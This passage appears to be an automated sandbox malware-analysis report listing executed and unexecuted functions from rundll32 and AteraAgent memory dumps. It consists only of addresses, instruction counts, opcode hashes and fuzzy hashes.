                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a7c6d39e52c395cb94c3d809f4212768b800c332298c2523093d2cb7b17cd719
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 56D0A931360220ABD640A3ACE45496A739EDF8A728B0008AAF20BCB734C992FC000388
                                                                                                                                                                                                                                                                                                Function 049717F0 Relevance: .0, Instructions: 18COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000005.00000003.1708190367.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_3_4970000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: e5136ee4920e18810ee9ca9b07873a66693618c41a7c8a268fc717f249a0e6e5
                                                                                                                                                                                                                                                                                                • Instruction ID: c0e491f84d3449127caa7211866a764e61771330a9eaa50c09e51bbadc59c2f4
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e5136ee4920e18810ee9ca9b07873a66693618c41a7c8a268fc717f249a0e6e5
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: ABD02E7730E2A00FC70BE720B86509A3F32AB8621130840ABE482CB6A7CE2004A2C3C0
                                                                                                                                                                                                                                                                                                Function 04970C0C Relevance: .0, Instructions: 17COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000005.00000003.1708190367.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_3_4970000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 8dac318128bd1d69448b96bc95f2c6ef300666de01d96a877b5b7bae0015cf3f
                                                                                                                                                                                                                                                                                                • Instruction ID: 4f5e1bc10312216bf87321779066b837d79f7e35d19524339eb22ae2d222227f
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8dac318128bd1d69448b96bc95f2c6ef300666de01d96a877b5b7bae0015cf3f
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 25D0A7323151286B56046718E84696ABB99E7842613104833FA02C3324DD60BC5083D5
                                                                                                                                                                                                                                                                                                Function 04971D10 Relevance: .0, Instructions: 17COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000005.00000003.1708190367.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_3_4970000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 5bea494e7b3a1b4d3fe6b240c066f6627fd97e4cb8ea2a38a26f702d44da23e0
                                                                                                                                                                                                                                                                                                • Instruction ID: 84ff17a0c328c0a7456bc4e10d4cc1d73ad713c703352f19ab4e8fa6489a7dff
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5bea494e7b3a1b4d3fe6b240c066f6627fd97e4cb8ea2a38a26f702d44da23e0
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B3D0A9303C030C9BF70022A0B82B33632AC9780B18F604034EE0C492C08AA868808760
                                                                                                                                                                                                                                                                                                Function 04971C29 Relevance: .0, Instructions: 15COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000005.00000003.1708190367.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_3_4970000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: a5c5c6bee4b35fc5a757a2d4cc44353ab526c34ad85b2c98a9b433ec60652660
                                                                                                                                                                                                                                                                                                • Instruction ID: 1caabc3875be08266b10b30f646657e5eff4d415ad7d507108b3716198564ac0
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a5c5c6bee4b35fc5a757a2d4cc44353ab526c34ad85b2c98a9b433ec60652660
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3FC0808FA4B2A517EE0713B07E0219B5F1286C2B10B0608B3C55CDE152F414951643AB
                                                                                                                                                                                                                                                                                                Function 04972968 Relevance: .0, Instructions: 15COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000005.00000003.1708190367.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_3_4970000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 233139647da99af3c6203aecef50a51e4b91c3dd53cb922347a60540cae86ae7
                                                                                                                                                                                                                                                                                                • Instruction ID: c12eb627eb7810327946c63b5368c3feda7e24a97c7142eec1246c4a2060e800
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 233139647da99af3c6203aecef50a51e4b91c3dd53cb922347a60540cae86ae7
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7AD05E75906209EFCF00DFB4EA0595DFBF9EB44210B2086A69804D3224EA306F508BA0
                                                                                                                                                                                                                                                                                                Function 04970440 Relevance: .0, Instructions: 10COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000005.00000003.1708190367.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_3_4970000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: dd2313fae13b6ade6e62bad890c71694bbd15a8c003fca06133209f4abc488b0
                                                                                                                                                                                                                                                                                                • Instruction ID: a52077fa03a6f8ad9bea8481abc8a2574d264c2ac64e1d4dd1912d1e308570e8
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dd2313fae13b6ade6e62bad890c71694bbd15a8c003fca06133209f4abc488b0
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 40C08CB2A90A108BE2188A0400002E9A3E0FBB0222B85C63AC28540808A22950178A14
                                                                                                                                                                                                                                                                                                Function 04971D28 Relevance: .0, Instructions: 9COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000005.00000003.1708190367.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_3_4970000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: fbf9a2853892fbd85ae4497e7357dbb95421ff6c4db32af79e4180882142afc9
                                                                                                                                                                                                                                                                                                • Instruction ID: 638cabdbdc7af69fafe9cc3e02450289eb130d3eb5ba5472cece9b824bbed613
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fbf9a2853892fbd85ae4497e7357dbb95421ff6c4db32af79e4180882142afc9
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 33C09270780308FBFB1426A0F826B6D7225EBD0B09F544471FA0DBA2C4CDA59C418350
                                                                                                                                                                                                                                                                                                Function 04970E7C Relevance: .0, Instructions: 8COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000005.00000003.1708190367.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_3_4970000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: b5efdf895495d07a58ac2055b1b30fd3a188f718ef6c8e8d4aa2c36700104d59
                                                                                                                                                                                                                                                                                                • Instruction ID: fa89a0e91ebe40519bf2032080f1f222d893f5fec6323cc388d843d661d350b9
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b5efdf895495d07a58ac2055b1b30fd3a188f718ef6c8e8d4aa2c36700104d59
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 50B01255785000177500AB3548D147A808396C0204BC4CC305203E401C5D24F0041104

                                                                                                                                                                                                                                                                                                Executed Functions

                                                                                                                                                                                                                                                                                                Function 00007FFD9B370C1D Relevance: 1.3, Instructions: 1273COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1763237049.00007FFD9B370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B370000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffd9b370000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 494fe8463ad51d24e8b9bbe34b571d330edb8b3f5746712df25504a2af232b58
                                                                                                                                                                                                                                                                                                • Instruction ID: 68d2a46488a442f3c1cd2e5516ffcce01ae4f0647ed6ff3bf0ac3dafd848e95a
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 494fe8463ad51d24e8b9bbe34b571d330edb8b3f5746712df25504a2af232b58
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F2B26A70A0961D8FDBA9EB54C8A4BA8B7B1FF59304F5500FDD01ED7296CA35AA81CF10
                                                                                                                                                                                                                                                                                                Function 00007FFD9B371895 Relevance: .7, Instructions: 738COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1763237049.00007FFD9B370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B370000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffd9b370000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 7561858a65d8f6e59d7c8938f1a80ec31d3bc03de115b2ffb8c6420ed882e6a7
                                                                                                                                                                                                                                                                                                • Instruction ID: 5323cee2d20bd4efc62031a3e75bd2c0c290db6c9e10a90181d5cbb31f78ee6f
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7561858a65d8f6e59d7c8938f1a80ec31d3bc03de115b2ffb8c6420ed882e6a7
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F3427C71E0A65D8FDBA5EA6488A57A9B7F1EF06300F1501FDD04DE72A2CA785E84CF00
                                                                                                                                                                                                                                                                                                Function 00007FFD9B37C922 Relevance: .5, Instructions: 459COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1763237049.00007FFD9B370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B370000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffd9b370000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 40be60cba888bd06376c53d9a0046de5988db18be123acb612e2687da1a709bd
                                                                                                                                                                                                                                                                                                • Instruction ID: 1ef5ea999116a795545221cf23fa9c2d863b74e3829e16a3d4d9cbe6bbafc46a
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 40be60cba888bd06376c53d9a0046de5988db18be123acb612e2687da1a709bd
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2FE1F730A09A4E8FEBA8EF28C8A57E977D1FF54310F44426EE80DC7295CF7499818781
                                                                                                                                                                                                                                                                                                Function 00007FFD9B371E7E Relevance: .1, Instructions: 144COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1763237049.00007FFD9B370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B370000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffd9b370000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: ad8a0dab4efa0b7deaf06dbcbcb1781ad64d8c7f4e36d4a0b12e2dc46cd1a2f7
                                                                                                                                                                                                                                                                                                • Instruction ID: ed7be8fb21cb2bdc8d943c17435386058fe03512df56c371c23b6ad5b8e11f52
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ad8a0dab4efa0b7deaf06dbcbcb1781ad64d8c7f4e36d4a0b12e2dc46cd1a2f7
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 76512D31E1A61D8FEBB5EE6888947A9B3B1EF59700F5241F9D00DD72A1CE356E818F40
                                                                                                                                                                                                                                                                                                Function 00007FFD9B371EA1 Relevance: .1, Instructions: 125COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1763237049.00007FFD9B370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B370000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffd9b370000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: bc9a2662e3abcb55b6054c8907ad1cfd4308eb77bb9f3b3efd6cd35a19025b84
                                                                                                                                                                                                                                                                                                • Instruction ID: 4bdb253d1b58f30e46c96e332774c9dac574308e1f4a8242634757cbf3d2fd36
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bc9a2662e3abcb55b6054c8907ad1cfd4308eb77bb9f3b3efd6cd35a19025b84
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 72414B31E1AA1D8FEBB5EE5888A57A9B3B1EF55701F1141F9D00CD72A1CE386E858F40
                                                                                                                                                                                                                                                                                                Function 00007FFD9B371EB6 Relevance: .1, Instructions: 119COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1763237049.00007FFD9B370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B370000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffd9b370000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 3bb2bc974337f3c0bbd81eef708e1e68734fb9329d6e521c8635ff5aba3a1724
                                                                                                                                                                                                                                                                                                • Instruction ID: 238efc4eede36d9b6a7e655d11eb327c6d75f4636df4df733afdccf763717e58
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3bb2bc974337f3c0bbd81eef708e1e68734fb9329d6e521c8635ff5aba3a1724
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6B411B71E0962D8FEBA5EF6488947A9B3B0EB19700F5141E9D00DD32A1CE34AF81CF40
                                                                                                                                                                                                                                                                                                Function 00007FFD9B376058 Relevance: 4.3, Strings: 3, Instructions: 589COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1763237049.00007FFD9B370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B370000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffd9b370000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: N_I$N_^$N_^
                                                                                                                                                                                                                                                                                                • API String ID: 0-3680607079
                                                                                                                                                                                                                                                                                                • Opcode ID: 7e352ec0d95e76c6c1a42a277cb4120af962492bbef98e5684ce2bf625bf2324
                                                                                                                                                                                                                                                                                                • Instruction ID: 054ca4e07a6b29cd523bfef88d8599a63177dbb4557d857045b916812b4072ec
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7e352ec0d95e76c6c1a42a277cb4120af962492bbef98e5684ce2bf625bf2324
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4CF13A57B0E9990BE325FAACB8B25E93B50EF8137574981BBD18CCB1E7DC14690683C1
                                                                                                                                                                                                                                                                                                Function 00007FFD9B3757E8 Relevance: 3.0, Strings: 2, Instructions: 492COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1763237049.00007FFD9B370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B370000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffd9b370000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: N_^$N_^
                                                                                                                                                                                                                                                                                                • API String ID: 0-324526423
                                                                                                                                                                                                                                                                                                • Opcode ID: b75871d12ffcfe7c2d8f8d432eacb9fbab2a2b682922baa147c082510a5c6336
                                                                                                                                                                                                                                                                                                • Instruction ID: 403b26a4b4e894ae8edcdcbbb9a4fc5150e43f038c1bbfea188cda72a5b3dbbe
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b75871d12ffcfe7c2d8f8d432eacb9fbab2a2b682922baa147c082510a5c6336
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 68E14D12B0F6960FE369B7BC68A25EC7B90EF42325B4901FFC189CB5E3DD5815498391
                                                                                                                                                                                                                                                                                                Function 00007FFD9B375730 Relevance: 2.8, Strings: 2, Instructions: 331COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1763237049.00007FFD9B370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B370000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffd9b370000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: c$N_^
                                                                                                                                                                                                                                                                                                • API String ID: 0-768855989
                                                                                                                                                                                                                                                                                                • Opcode ID: aafb44916ce662333898b172fff67fa0e6a9ec78214756ce0f40247a9cf12729
                                                                                                                                                                                                                                                                                                • Instruction ID: c73ea7cbd338d1f082c3dd46a1bb1060a540c9a57dc480feda8194fa2cfa3b62
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: aafb44916ce662333898b172fff67fa0e6a9ec78214756ce0f40247a9cf12729
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0C91F757B1F6960BE32573BC78B21EC7B90DF43275B4901FBC19D8B5E39C48184A8295
                                                                                                                                                                                                                                                                                                Function 00007FFD9B460853 Relevance: 1.0, Instructions: 975COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1763506251.00007FFD9B460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B460000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffd9b460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 410d3f203082cab5d50d6e8b94d687e765daac55220f5c29804597e526d7bcd8
                                                                                                                                                                                                                                                                                                • Instruction ID: d06f268c7b8bc4f244019958dbf809236e20f8b7ae2443e8501963033e7c0103
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 410d3f203082cab5d50d6e8b94d687e765daac55220f5c29804597e526d7bcd8
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 40F12620B0EA494FE7A8D76C88696747BD1EF56B14B0502FED08EC72F7DD18AC028781
                                                                                                                                                                                                                                                                                                Function 00007FFD9B370C89 Relevance: .9, Instructions: 922COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1763237049.00007FFD9B370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B370000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffd9b370000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 96197ef1b694df7178c29fb445a0cc7f7c43e92ad81b7c84f1405a2127eb9ecd
                                                                                                                                                                                                                                                                                                • Instruction ID: 4e1443c60c30fc87acf492ebd2c460eac2464ec5155a16600e4364f2da7c2485
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 96197ef1b694df7178c29fb445a0cc7f7c43e92ad81b7c84f1405a2127eb9ecd
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 73825B71A0991D8FEBA9EB14C8A4BA8B3A1FF58305F5540FDD01ED7295CE35AA81CF10
                                                                                                                                                                                                                                                                                                Function 00007FFD9B37B679 Relevance: .4, Instructions: 413COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1763237049.00007FFD9B370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B370000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffd9b370000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: e31c57a023c92ec41b5e5c641b0c5b7015634df176bb932133eccb60cacc62f5
                                                                                                                                                                                                                                                                                                • Instruction ID: 144a811ce06a79bf2d3c8f341efad170d40a0d372bdc746affec607c56f223f9
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e31c57a023c92ec41b5e5c641b0c5b7015634df176bb932133eccb60cacc62f5
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BDD1DB30A0DA8D8FEB68EF28C8657E977E1FF59300F04426EE85DC7295DB7499418B81
                                                                                                                                                                                                                                                                                                Function 00007FFD9B376772 Relevance: .4, Instructions: 407COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1763237049.00007FFD9B370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B370000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffd9b370000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: a1af578b202b3c82fd452cafd728dcf892e0929d7fa2343497a29b28f06f5ae2
                                                                                                                                                                                                                                                                                                • Instruction ID: 92d42022ec6d85cb4cb89497a0f2f55b34cfb079d4b76c886eeaf099e8429157
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a1af578b202b3c82fd452cafd728dcf892e0929d7fa2343497a29b28f06f5ae2
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5FE14E61A0E6CE4FE7B5EB6888B56A53FE0EF12350F0941FED089CB1F3D918A9058741
                                                                                                                                                                                                                                                                                                Function 00007FFD9B377A45 Relevance: .4, Instructions: 387COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1763237049.00007FFD9B370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B370000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffd9b370000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 1cac296bd5d1bdaf72b511d5d2737a75abd17eee4b5495244c0eee7d68774151
